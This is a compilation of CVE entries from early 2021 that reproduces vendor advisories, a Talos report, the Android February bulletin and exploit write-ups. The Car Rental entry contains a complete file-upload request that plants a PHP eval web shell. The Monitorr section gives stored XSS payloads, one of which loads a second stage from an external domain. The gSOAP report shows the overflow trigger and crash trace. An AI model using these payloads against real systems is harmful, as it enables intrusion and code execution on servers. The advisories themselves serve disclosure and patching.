PHPGurukul Car Rental Project version 2.0 suffers from a remote shell upload vulnerability in changeimage1.php.

    # Exploit Title: Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution# Date: 3/2/2021# Exploit Author: Jannick Tiger# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/# Version : V 2.0# Vulnerability Type: Arbitrary File Upload # Tested on Windows 10 、XAMPP# This application is vulnerable to Arbitrary File Upload to Remote Code Execution vulnerability.# Vulnerable script:POST /carrental/admin/changeimage1.php?imgid=4 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------346751171915680139113101061568Content-Length: 369Origin: http://localhostConnection: closeReferer: http://localhost/carrental/admin/changeimage1.php?imgid=4Cookie: PHPSESSID=te82lj6tvep7afns0qm890393eUpgrade-Insecure-Requests: 1-----------------------------346751171915680139113101061568Content-Disposition: form-data; name="img1"; filename="1.php"Content-Type: application/octet-stream<?php @eval($_POST[pp]);?>-----------------------------346751171915680139113101061568Content-Disposition: form-data; name="update"-----------------------------346751171915680139113101061568--# Uploaded Malicious File can be Found in :carrental\admin\img\vehicleimages\1.php# go to http://localhost/carrental/admin/img/vehicleimages/1.php,Execute malicious code via post value phpinfo();

CVE-2021-26809: Car Rental Project 2.0 Shell Upload ≈ Packet Storm

Privilege escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.8 allows an authenticated user to gain elevated privileges through the User Interface and execute commands on the appliance via incorrect improper neutralization of user input in the troubleshooting page.

**First Published:** February 16, 2021

 

**Product:**

**Impacted Versions:**

**CVE ID:**

**Impact of Vulnerabilities:**

**Severity Ratings:**

**CVSS v3.1  
Base/Temporal Scores:**

McAfee Web Gateway (MWG)

Prior to:  
10.0.4  
9.2.8  
8.2.17   

CVE-2021-23885

CWE-269: Improper Privilege Management

Critical

9.0 / 8.3

 **Recommendations:**

Install or update to MWG 8.2.17, 9.2.8, or 10.0.4

 **Security Bulletin Replacement:**

None

 **Location of updated software:**

http://www.mcafee.com/us/downloads/downloads.aspx

To receive email notification when this Security Bulletin is updated, click **Subscribe** on the right side of the page. You must be logged on to subscribe.

**Article contents:**

*   Vulnerability Description
*   Remediation
*   Frequently Asked Questions (FAQs)
*   Resources
*   Disclaimer

**Vulnerability Description**  
This exploit requires the attacker to gain authenticated access to the MWG User Interface. McAfee recommends that access to the User Interface is restricted to trusted networks and that the number of people authorized to log on is limited. This issue results in commands being executed as root on the MWG appliance.

McAfee is not aware of this issue being exploited in the field.

  **CVE-2021-23885**  
Privilege escalation vulnerability in McAfee Web Gateway (MWG) prior to 9.2.8 allows an authenticated user to gain elevated privileges through the User Interface and execute commands on the appliance via incorrect improper neutralization of user input in the troubleshooting page.  
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-23885     
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23885  
**Remediation**  
To remediate this issue:

*   Customers on the Controlled release branch 10.0.x: Update to 10.0.4.
*   Customers on 9.2.x: Update to 9.2.8.
*   Customers on 8.2.x:  Upgrade to 9.2.8 or update to 8.2.17.

Go to the Product Downloads site, and download the applicable product update file:

**Product**

**Version**

**Type**

**Release Date**

MWG

10.0.4

Update (Controlled release)

February 15, 2021

MWG           

9.2.8 

Update

February 15, 2021

MWG

8.2.17

Update

February 15, 2021

 

**Download and Installation Instructions**  
For instructions to download McAfee product updates and hotfixes, see: KB56057 - How to download Enterprise product updates and documentation. Review the Release Notes and the Installation Guide for instructions on how to install these updates. All documentation is available at https://docs.mcafee.com.  
**Frequently Asked Questions (FAQs)**  
**How do I know if my McAfee product is vulnerable or not?**

For Appliances:

Use the following instructions for Appliance-based products:

1.  Open the Administrator's User Interface (UI).
2.  Click the **About** link. The product version displays.

**What is CVSS?**  
CVSS, or Common Vulnerability Scoring System, is the result of the National Infrastructure Advisory Council's effort to standardize a system of assessing the criticality of a vulnerability. This system offers an unbiased criticality score between 0 and 10 that customers can use to judge how critical a vulnerability is and plan accordingly. For more information, visit the CVSS website at: https://www.first.org/cvss/.

  When calculating CVSS scores, McAfee has adopted a philosophy that fosters consistency and repeatability. Our guiding principle for CVSS scoring is to score the exploit under consideration by itself. We consider only the immediate and direct impact of the exploit under consideration. We do not factor into a score any potential follow-on exploits that might be made possible by the successful exploitation of the issue being scored.

  **What are the CVSS scoring metrics?**

**CVE-2021-23885: Privilege escalation vulnerability in MWG**

**Base Score**

**9.0**

Attack Vector (AV)

Network (N)

Attack Complexity (AC)

Low (L)

Privileges Required (PR)

Low (L)

User Interaction (UI)

Required (R)

Scope (S)

Changed (C)

Confidentiality (C)

High (H)

Integrity (I)

High (H)

Availability (A)

High (H)

**Temporal Score (Overall)**

**8.3**

Exploitability (E)

Proof of Concept (P)

Remediation Level (RL)

Official Fix (O)

Report Confidence (RC)

Confirmed (C)

 

**NOTE:** The below CVSS version 3.1 vector was used to generate this score.  
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C&version=3.1

**Where can I find a list of all Security Bulletins?**  
All Security Bulletins are published on our external PSIRT website at https://www.mcafee.com/us/threat-center/product-security-bulletins.aspx. To see Security Bulletins for McAfee Enterprise products on this website click **Enterprise Security Bulletins**. Security Bulletins are retired (removed) once a product is both End of Sale and End of Support (End of Life).

  **How do I report a product vulnerability to McAfee?**  
If you have information about a security issue or vulnerability with a McAfee product, visit the McAfee PSIRT website for instructions at https://www.mcafee.com/us/threat-center/product-security-bulletins.aspx. To report an issue, click **Report a Security Vulnerability**.

  **How does McAfee respond to this and any other reported security flaws?**  
Our key priority is the security of our customers. If a vulnerability is found within any McAfee software or services, we work closely with the relevant security software development team to ensure the rapid and effective development of a fix and communication plan.

  McAfee only publishes Security Bulletins if they include something actionable such as a workaround, mitigation, version update, or hotfix. Otherwise, we would simply be informing the hacker community that our products are a target, putting our customers at greater risk. For products that are updated automatically, a non-actionable Security Bulletin might be published to acknowledge the discoverer.

  View our PSIRT policy on the McAfee PSIRT website at https://www.mcafee.com/us/threat-center/product-security-bulletins.aspx by clicking **About PSIRT**.  
**Resources**  
To contact Technical Support, log on to the ServicePortal and go to the Create a Service Request page at https://support.mcafee.com/ServicePortal/faces/serviceRequests/createSR:

*   If you are a registered user, type your User ID and Password, and then click **Log In**.
*   If you are not a registered user, click **Register** and complete the required fields. Your password and logon instructions will be emailed to you.

**Disclaimer**

The information provided in this Security Bulletin is provided as is without warranty of any kind. McAfee disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall McAfee or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if McAfee or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the preceding limitation may not apply.

  Any future product release dates mentioned in this Security Bulletin are intended to outline our general product direction, and they should not be relied on in making a purchasing decision. The product release dates are for information purposes only, and may not be incorporated into any contract. The product release dates are not a commitment, promise, or legal obligation to deliver any material, code, or functionality. The development, release, and timing of any features or functionality described for our products remains at our sole discretion and may be changed or canceled at any time.

CVE-2021-23885: McAfee Security Bulletin - Web Gateway update fixes a Privilege escalation vulnerability (CVE-2021-23885)

A denial of service and memory corruption vulnerability was found in Hilscher EtherNet/IP Core V2 prior to V2.13.0.21that may lead to code injection through network or make devices crash without recovery.

2021-02-16 15:53 (CET) VDE-2021-007  

**Pepperl+Fuchs: Multiple Products - Vulnerability may allow remote attackers to cause a Denial Of Service**  
Share: Email | Twitter  

**Published**

2021-02-16 15:53 (CET)

**Last update**

2021-02-16 15:53 (CET)

**Vendor(s)**

Pepperl+Fuchs SE  

**Product(s)**

Article No°

Product Name

Affected Version(s)

262163

PCV100-F200-B25-V1D-6011

<= V1.10.0

284068

PCV100-F200-B25-V1D-6011-6720

<= V1.10.0

262161

PCV50-F200-B25-V1D

<= V1.10.0

262162

PCV80-F200-B25-V1D

<= V1.10.0

293431-100004

PXV100-F200-B25-V1D

<= V1.10.0

293431-100010

PXV100I-F200-B25-V1D

<= V1.10.0

262006

WCS3B-LS510

<= V1.2.1

304867

WCS3B-LS510D

<= V1.2.1

304868

WCS3B-LS510DH

<= V1.2.1

312681

WCS3B-LS510DH-OM

<= V1.2.1

312682

WCS3B-LS510D-OM

<= V1.2.1

304866

WCS3B-LS510H

<= V1.2.1

312680

WCS3B-LS510H-OM

<= V1.2.1

312683

WCS3B-LS510-OM

<= V1.2.1

**Summary**

Critical vulnerability has been discovered in the utilized component Ethernet IP Stack by Hilscher Gesellschaft für Systemautomation mbH.  
The impact of the vulnerability on the affected device is that it can

*   denial of service
*   remote code execution
*   code exposure

For more information see advisory by Hilscher:  
https://kb.hilscher.com/pages/viewpage.action?pageId=108969480

**CVE ID**

**Severity**

**Weakness**

Stack-based Buffer Overflow  (CWE-121) 

**Summary**

A denial of service and memory corruption vulnerability was found in Hilscher EtherNet/IP Core V2 prior to V2.13.0.21that may lead to code injection through network or make devices crash without recovery.

**Source**

**Impact**

Pepperl+Fuchs analyzed and identified affected devices.  
Remote attackers may cause a cause a Denial Of Service of the product.

**Solution**

**Mitigation**

An external protective measure is required.

*   Minimize network exposure for affected products and ensure that they are not accessible via the Internet.
*   Isolate affected products from the corporate network.
*   If remote access is required, use secure methods such as virtual private networks (VPNs).

**Reported by**

Hilscher Gesellschaft für Systemautomation mbH

CVE-2021-20987: VDE-2021-007 | CERT@VDE

A Denial of Service vulnerability was found in Hilscher PROFINET IO Device V3 in versions prior to V3.14.0.7. This may lead to unexpected loss of cyclic communication or interruption of acyclic communication.

Vulnerability Description

**Short Decription**

A Denial of Service vulnerability in Hilscher PROFINET IO Device V3 based solutions may lead to unexpected loss of cyclic communication or interruption of acyclic communication.

**Detailed Description**

When handling Read Implicit Request services, depending on the content of the request, the Hilscher PROFINET IO Device V3 protocol stack does not properly limit available resources. This may lead to shortage of resources which in the end may lead to described ímpact.

**Vulnerability Severity****Impact / Implications**

The impact of the vulnerability on the affected device is that it

*   can no longer perform acyclic requests
*   may drop all established cyclic connections
*   may disappear completely from the network

**Corrective Action or Resolution**

Affected users should upgrade to the hotfix version  PROFINET IO-Device V3.14.0.7  or newer.

**Workaround**

There is no workaround. However, using cell protection mechanisms and ensuring that no untrusted entity is connected to the network may reduce the risk of occurrence.

  
**Disclaimer**

The security advisory and information contained herein, are provided on an "as is" basis and do not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. The information in this advisory should not be construed as a commitment by Hilscher. In no event shall Hilscher be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, nor shall Hilscher be liable for incidental or consequential damages arising from use of any software or hardware described in this advisory.  
Hilscher provides no warranty, express or implied, for the information contained in this document, and assumes no responsibility for the information contained in this document or for any errors that may appear in this document. Your use of the advisory and information contained herein, or materials linked from the advisory, is at your own risk.  Information in this advisory and any related communications is based on our knowledge at the time of publication and is subject to change without notice. Hilscher reserves the right to change or update advisories at any time.

CVE-2021-20986: 2020-12-03 Denial of Service vulnerability in PROFINET IO Device - Hilscher Cyber Security

Mumble before 1.3.4 allows remote code execution if a victim navigates to a crafted URL on a server list and clicks on the Open Webpage text.

Permalink

Browse files

FIX(client): Only allow "http"/"https" for URLs in ConnectDialog

Our public server list registration script doesn't have an URL scheme
whitelist for the website field.

Turns out a malicious server can register itself with a dangerous URL in
an attempt to attack a user's machine.

User interaction is required, as the URL has to be opened by
right-clicking on the server entry and clicking on "Open Webpage".

This commit introduces a client-side whitelist, which only allows "http"
and "https" schemes. We will also implement it in our public list.

In future we should probably add a warning QMessageBox informing the
user that there's no guarantee the URL is safe (regardless of the
scheme).

Thanks a lot to https://positive.security for reporting the RCE
vulnerability to us privately.

*   Loading branch information

Showing with **17 additions** and **3 deletions**.

1.  +17 −3 src/mumble/ConnectDialog.cpp

CVE-2021-27229: FIX(client): Only allow "http"/"https" for URLs in ConnectDialog · mumble-voip/mumble@e59ee87

A code execution vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**Summary**

A code execution vulnerability exists in the WS-Addressing plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

**Tested Versions**

Genivia gSOAP 2.8.107

**Product URLs**

https://www.genivia.com/products.html#gsoap

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-680 - Integer Overflow to Buffer Overflow

**Details**

The gSOAP toolkit is a C/C++ library for developing XML-based web services. It includes several plugins to support the implementation of SOAP and web service standards. The framework also provides multiple deployment options including modules for both IIS and Apache, standalone CGI scripts and its own standalone HTTP service.

One of the many plugins provided by gSOAP includes the wsa plugin for supporting the WS-Addressing specification which provides an asynchronous mechanism for routing SOAP requests and responses. The specification includes a element for providing URI parameters to a number of different parts of both requests and responses. The URIs may include a username and password for the resource in a standard format. http://user:password@somehost.com A buffer overflow vulnerability existing in the parsing of these extra parameters.

It starts by looking for the : in the uri and assumes that if it’s not part of :// that is is the seperator between the username and password.

    21234   s = strchr(endpoint, ':');
    21235   if (s && s[1] == '/' && s[2] == '/') // Skip the :// part of the parameter
    21236     s += 3;
    21237   else // Assume it's the seperator and start from the beginning of the element
    21238     s = endpoint;  
    

Processing continues by trying to find the @ to seperate the user:pass from the hostname. At this point, parsing of the username and password occurs assuming we have found both seperators (@ and :)

    21240   t = strchr(s, '@'); // attempts to find the seperator 
    21241
    21242   if (t && *s != ':' && *s != '@')
    21243   {
    21244     size_t l = t - s + 1;  // Calculate the size of the user:pass part of the string
    21245     char *r = (char*)soap_malloc(soap, l); // Allocate enough storage to hold both the user and pass
    21246     n = s - endpoint;
    21247     if (r)
    21248     {
    21249       s = soap_decode(r, l, s, ":@");  // s is still pointing to the beginning of the data in this element
    21250       soap->userid = r; // r is now a copy of the user part of the string up to the :
    21251       soap->passwd = SOAP_STR_EOS;
    21252       if (*s == ':') // s now points to the : seperator
    21253       {
    21254         s++; // Step past the seperator and now we should be pointing to the password section
    21255         if (*s != '@') // Make sure the password isn't empty
    21256         {
    21257           l = t - s + 1; // t points to the @ seperator so here we calculate the length of the password by subtracting between the two seperators
    21258           r = r + strlen(r) + 1; // r currently points to the copied username so we skip past to copy the password into the same buffer.
    21259           s = soap_decode(r, l, s, "@"); // l is now a very large number allowing us to write us much data to the head as we like and cleanly terminate the copy with an @
    21260           soap->passwd = r;
    21261         }
    21262       }
    21263     }
    21264     s++;
    21265     soap_strcpy(soap->endpoint + n, sizeof(soap->endpoint) - n, s);
    21266   }
    

Here the code makes an assumption about the order of the : and @ seperators. It assumes that the @ (t) is after :(s) and calculates the size for the second soap\_decode based on this assumption. If the : comes after the @, this calculation causes the calculated size to be negative and wrap around and become a very large length value to soap_decode to parse the password.

Within soap\_decode, an attempt to copy the data into a the new heap buffer occurs. As the length is a very large number and the counter is counting backwards, we are able to write an arbitrary amount of data past our destination buffer.

    7919 soap_decode(char *buf, size_t len, const char *val, const char *sep)
    7920 {
    7921   const char *s;
    7922   char *t = buf;
    7923   size_t i = len;
    7924   for (s = val; *s; s++)
    7925     if (*s != ' ' && *s != '\t' && !strchr(sep, *s))
    7926       break;
    7927   if (len > 0)
    7928   {
    7929     if (*s == '"')
    7930     {
    7931       s++;
    7932  
    7933       while (*s && *s != '"' && --i)
    7934         *t++ = *s++;
    7935     }
    

**Crash Information**

    Starting program: /gsoap-2.8/gsoap/samples/wsa/wsademo 8080
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    Server is running
    malloc(): memory corruption
    
    Program received signal SIGABRT, Aborted.
    __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
    51	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    (gdb) bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
    #1  0x00007ffff70af8b1 in __GI_abort () at abort.c:79
    #2  0x00007ffff70f8907 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7225dfa "%s\n") at ../sysdeps/posix/libc_fatal.c:181
    #3  0x00007ffff70ff97a in malloc_printerr (str=str@entry=0x7ffff722406e "malloc(): memory corruption") at malloc.c:5350
    #4  0x00007ffff7103a04 in _int_malloc (av=av@entry=0x7ffff745ac40 <main_arena>, bytes=bytes@entry=72) at malloc.c:3738
    #5  0x00007ffff710616c in __GI___libc_malloc (bytes=72) at malloc.c:3057
    #6  0x000055555556ddae in soap_malloc (soap=soap@entry=0x7ffff7fba010, n=56, n@entry=48) at stdsoap2_ssl.c:10428
    #7  0x000055555556de7f in soap_strdup (soap=soap@entry=0x7ffff7fba010, s=s@entry=0x555555589430 "http://www.w3.org/2005/08/addressing/soap/fault") at stdsoap2_ssl.c:2806
    #8  0x000055555557eedd in soap_try_connect_command (soap=soap@entry=0x7ffff7fba010, http_command=http_command@entry=2000,
        endpoint=endpoint@entry=0x55555579db40 "http://%@AAAA:", 'B' <repeats 186 times>..., action=action@entry=0x555555589430 "http://www.w3.org/2005/08/addressing/soap/fault")
        at stdsoap2_ssl.c:21486
    #9  0x0000555555582cdb in soap_connect_command (soap=soap@entry=0x7ffff7fba010, http_command=http_command@entry=2000,
        endpoints=0x55555579db40 "http://%@AAAA:", 'B' <repeats 186 times>..., action=0x555555589430 "http://www.w3.org/2005/08/addressing/soap/fault") at stdsoap2_ssl.c:21455
    #10 0x0000555555582de0 in soap_connect (soap=soap@entry=0x7ffff7fba010, endpoint=<optimized out>, action=<optimized out>) at stdsoap2_ssl.c:21408
    #11 0x0000555555562ebb in soap_wsa_fault_subcode_action (soap=soap@entry=0x7ffff7fba010, flag=flag@entry=1, faultsubcode=faultsubcode@entry=0x555555589856 "wsa5:ActionNotSupported",
        faultstring=faultstring@entry=0x555555589d50 "The [action] cannot be processed at the receiver.", faultdetail=faultdetail@entry=0x0, action=action@entry=0x0)
        at ../../plugin/wsaapi.c:1088
    #12 0x0000555555563145 in soap_wsa_fault_subcode (faultdetail=0x0, faultstring=0x555555589d50 "The [action] cannot be processed at the receiver.",
        faultsubcode=0x555555589856 "wsa5:ActionNotSupported", flag=1, soap=0x7ffff7fba010) at ../../plugin/wsaapi.c:1022
    #13 soap_wsa_sender_fault_subcode (faultdetail=0x0, faultstring=0x555555589d50 "The [action] cannot be processed at the receiver.", faultsubcode=0x555555589856 "wsa5:ActionNotSupported",
        soap=0x7ffff7fba010) at ../../plugin/wsaapi.c:1126
    #14 soap_wsa_error (soap=soap@entry=0x7ffff7fba010, fault=fault@entry=wsa5__ActionNotSupported, info=0x0) at ../../plugin/wsaapi.c:1428
    #15 0x0000555555563a7d in soap_wsa_set_error (soap=0x7ffff7fba010, c=0x55555579bbf0, s=0x55555579bc20) at ../../plugin/wsaapi.c:1623
    #16 0x000055555558535f in soap_set_fault (soap=soap@entry=0x7ffff7fba010) at stdsoap2_ssl.c:22051
    #17 0x00005555555861f3 in soap_send_fault (soap=0x7ffff7fba010) at stdsoap2_ssl.c:22314
    #18 0x00005555555588f3 in main (argc=2, argv=<optimized out>) at wsademo.c:85
    

**Timeline**

2020-11-05 - Vendor Disclosure  
2020-12-16 - Vendor advised patch released on 2020-11-20  
2021-01-05 - Public Release

Discovered by a member of Cisco Talos.

CVE-2020-13576: TALOS-2020-1187 || Cisco Talos Intelligence Group

In onReceive of BluetoothPermissionRequest.java, there is a possible permissions bypass due to a mutable PendingIntent. This could lead to local escalation of privilege that bypasses a permission check, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-158219161

_Published February 1, 2021 | Updated February 2, 2021_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2021-02-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the Media Framework component that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2021-02-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2021-02-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Android runtime**

The vulnerability in this section could lead to remote information disclosure with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2021-0341  

A-171980069 \[2\]

ID

High

8.1, 9, 10, 11

**Framework**

The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2021-0302  

A-155287782

EoP

High

8.1, 9, 10

CVE-2021-0305  

A-154015447 \[2\] \[3\]

EoP

High

8.1, 9, 10

CVE-2021-0314  

A-171221302

EoP

High

8.1, 9, 10, 11

CVE-2021-0327  

A-172935267

EoP

High

8.1, 9, 10, 11

CVE-2021-0330  

A-170732441

EoP

High

9, 10, 11

CVE-2021-0334  

A-163358811

EoP

High

8.1, 9, 10, 11

CVE-2021-0337  

A-157474195

EoP

High

8.1, 9, 10, 11

CVE-2021-0339  

A-145728687 \[2\] \[3\] \[4\] \[5\]

EoP

High

8.1, 9, 10

CVE-2021-0340  

A-134155286

EoP

High

10

CVE-2021-0338  

A-156260178

DoS

High

10, 11

**Media Framework**

The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2021-0325  

A-174238784

RCE

High

10, 11

RCE

Critical

8.1, 9

CVE-2021-0332  

A-169256435

EoP

High

10, 11

CVE-2021-0335  

A-160346309

ID

High

11

**System**

The most severe vulnerability in this section could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2021-0326  

A-172937525

RCE

Critical

8.1, 9, 10, 11

CVE-2021-0328  

A-172670415

EoP

High

8.1, 9, 10, 11

CVE-2021-0329  

A-171400004

EoP

High

8.1, 9, 10, 11

CVE-2021-0331  

A-170731783

EoP

High

8.1, 9, 10, 11

CVE-2021-0333  

A-168504491

EoP

High

8.1, 9, 10, 11

CVE-2021-0336  

A-158219161

EoP

High

8.1, 9, 10, 11

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Component

CVE

Media Codecs

CVE-2021-0325

**2021-02-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2021-02-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel components**

The vulnerability in this section could enable a local attacker to execute arbitrary code within the context of a privileged process.

    

CVE

References

Type

Severity

Component

CVE-2017-18509

A-172999675  
Upstream kernel

EoP

High

IPv6 multicast

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Component

CVE-2020-11272

A-172348733  
QC-CR#2598841  
QC-CR#2771345

Critical

WLAN

CVE-2020-11271

A-172348954  
QC-CR#2555096

High

Audio

CVE-2020-11277

A-172349048  
QC-CR#2731406 \*

High

Camera

CVE-2020-11282

A-161374239  
QC-CR#2748408

High

Display

CVE-2020-11286

A-172348990  
QC-CR#2755788

High

Kernel

CVE-2020-11297

A-172349044  
QC-CR#2588832

High

WLAN

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Component

CVE-2020-11163

A-162751928\*

Critical

Closed-source component

CVE-2020-11170

A-162753079\*

Critical

Closed-source component

CVE-2020-11177

A-162755362\*

High

Closed-source component

CVE-2020-11180

A-168050602\*

High

Closed-source component

CVE-2020-11187

A-162755638\*

High

Closed-source component

CVE-2020-11253

A-168722706\*

High

Closed-source component

CVE-2020-11269

A-172348983\*

High

Closed-source component

CVE-2020-11270

A-172349024\*

High

Closed-source component

CVE-2020-11275

A-172348985\*

High

Closed-source component

CVE-2020-11276

A-172349003\*

High

Closed-source component

CVE-2020-11278

A-172349045\*

High

Closed-source component

CVE-2020-11280

A-172348987\*

High

Closed-source component

CVE-2020-11281

A-161714839\*

High

Closed-source component

CVE-2020-11283

A-168918306\*

High

Closed-source component

CVE-2020-11287

A-172348989\*

High

Closed-source component

CVE-2020-11296

A-172348729\*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2021-02-01 or later address all issues associated with the 2021-02-01 security patch level.
*   Security patch levels of 2021-02-05 or later address all issues associated with the 2021-02-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2021-02-01\]
*   \[ro.build.version.security\_patch\]:\[2021-02-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2021-02-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2021-02-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2021-02-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

February 1, 2021

Bulletin released

1.1

February 2, 2021

Bulletin revised to include AOSP links

CVE-2021-0336: Android Security Bulletin—February 2021

Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.

Well, we pwned one more piece of software. Who cares? Nah, nobody. Alright, now user “nobody” – see how we did that.

Monitorr 1.7.6:

1.  Was written on PHP, that is a good sign for us attackers.
2.  Has 366 stars on Github.
3.  Designed to do monitoring. We like this kind of software.

**Auth Bypass**

Classical situation – an attacker can access installation panel after the actual installation.

Monitorr/assets/config/\_installation/\_register.php

Create a new user and authorize on behalf of this user.

**Remote Code Execution**

The vulnerable code resides in “upload.php” file. The only check that is done on the uploaded file is getimagesize() function:

This function can be easily bypassed by prepending standard image properties to an executable file. In this example, a payload mimics a GIF image:

After size check is passed, the file is successfully uploaded:

So we can see our PHP code executed:

It’s important to emphasize that no authentication checks are done in the upload.php script.

**Cross-Site Scripting (XSS)**

Two stored XSS have been found on service configuration tab at Monitorr settings page. Despite the length restriction, a malicious actor still can experience a full-feautered XSS attack by loading the second-stage payload from an external short domain like 14.rs .

Form field

Payload

Service URL

“><payload><a href="

Service Title

<embed src=//14.rs>

Service Image

“onerror=”alert(document.location)

Steps to Reproduce  
1\. Log in the application  
2\. Navigate to Service configuration tab  
3\. Enter the payload  
